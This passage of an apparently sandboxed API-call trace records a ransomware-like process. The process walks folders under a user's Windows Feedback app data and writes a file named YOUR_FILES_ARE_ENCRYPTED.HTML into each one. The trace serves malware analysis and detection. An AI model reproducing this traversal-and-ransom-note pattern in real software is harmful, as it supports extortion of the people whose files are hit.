lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9993618c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9993618c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9995c397, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName="..", cAlternateFileName="")) returned 1 [0120.332] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9995c397, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9995c397, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9995c397, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0120.332] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.332] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetCache") returned 101 [0120.332] GetProcessHeap () returned 0x600000 [0120.332] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.333] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetCache" [0120.333] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetCache\\*" [0120.333] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9995c397, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9995c397, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9995c397, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6da3e0, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0120.334] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9995c397, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9995c397, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9995c397, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6da3e0, cFileName="..", cAlternateFileName="")) returned 1 [0120.334] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9995c397, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9995c397, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9995c397, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6da3e0, cFileName="..", cAlternateFileName="")) returned 0 [0120.334] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0120.334] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0120.334] GetProcessHeap () returned 0x600000 [0120.334] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.334] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsfeedback_cw5n1h2txyewy\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.335] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.336] CloseHandle (hObject=0x320) returned 1 [0120.336] GetProcessHeap () returned 0x600000 [0120.336] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.336] GetProcessHeap () returned 0x600000 [0120.336] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.336] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9995c397, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9995c397, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9995c397, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0120.336] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.336] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetCookies") returned 103 [0120.336] GetProcessHeap () returned 0x600000 [0120.336] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.337] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetCookies" [0120.337] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetCookies\\*" [0120.337] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9995c397, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9995c397, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9995c397, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6da3e0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.337] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9995c397, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9995c397, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9995c397, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6da3e0, cFileName="..", cAlternateFileName="")) returned 1 [0120.338] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9995c397, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9995c397, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9995c397, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6da3e0, cFileName="..", cAlternateFileName="")) returned 0 [0120.338] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.338] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 133 [0120.338] GetProcessHeap () returned 0x600000 [0120.338] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.338] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsfeedback_cw5n1h2txyewy\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.339] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.340] CloseHandle (hObject=0x320) returned 1 [0120.340] GetProcessHeap () returned 0x600000 [0120.340] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.340] GetProcessHeap () returned 0x600000 [0120.340] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.341] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9995c397, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9995c397, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9995c397, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0120.341] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.341] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetHistory") returned 103 [0120.341] GetProcessHeap () returned 0x600000 [0120.342] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.342] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetHistory" [0120.343] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetHistory\\*" [0120.343] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9995c397, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9995c397, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9995c397, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6da3e0, cFileName=".", cAlternateFileName="")) returned 0x626778 [0120.343] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9995c397, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9995c397, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9995c397, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6da3e0, cFileName="..", cAlternateFileName="")) returned 1 [0120.343] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9995c397, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9995c397, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9995c397, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6da3e0, cFileName="..", cAlternateFileName="")) returned 0 [0120.343] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0120.343] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 133 [0120.343] GetProcessHeap () returned 0x600000 [0120.343] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.343] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsfeedback_cw5n1h2txyewy\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.344] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.345] CloseHandle (hObject=0x320) returned 1 [0120.345] GetProcessHeap () returned 0x600000 [0120.345] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.345] GetProcessHeap () returned 0x600000 [0120.345] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.346] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9995c397, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9995c397, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9995c397, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName="Temp", cAlternateFileName="")) returned 1 [0120.346] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.346] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\Temp") returned 96 [0120.346] GetProcessHeap () returned 0x600000 [0120.346] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.346] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\Temp" [0120.346] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\Temp\\*" [0120.346] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9995c397, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9995c397, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9995c397, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6da3e0, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0120.346] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9995c397, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9995c397, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9995c397, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6da3e0, cFileName="..", cAlternateFileName="")) returned 1 [0120.346] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9995c397, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9995c397, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9995c397, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6da3e0, cFileName="..", cAlternateFileName="")) returned 0 [0120.346] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0120.346] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0120.346] GetProcessHeap () returned 0x600000 [0120.346] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.346] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsfeedback_cw5n1h2txyewy\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.347] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.348] CloseHandle (hObject=0x320) returned 1 [0120.348] GetProcessHeap () returned 0x600000 [0120.348] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.348] GetProcessHeap () returned 0x600000 [0120.348] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.348] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9995c397, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9995c397, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9995c397, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName="Temp", cAlternateFileName="")) returned 0 [0120.348] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0120.349] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0120.349] GetProcessHeap () returned 0x600000 [0120.349] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.349] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsfeedback_cw5n1h2txyewy\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.349] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.350] CloseHandle (hObject=0x31c) returned 1 [0120.350] GetProcessHeap () returned 0x600000 [0120.351] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.351] GetProcessHeap () returned 0x600000 [0120.351] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.352] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x998c3a7f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x998c3a7f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x998c3a7f, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0120.352] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.352] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AppData") returned 96 [0120.352] GetProcessHeap () returned 0x600000 [0120.352] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.353] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AppData" [0120.353] lstrcatW (in: 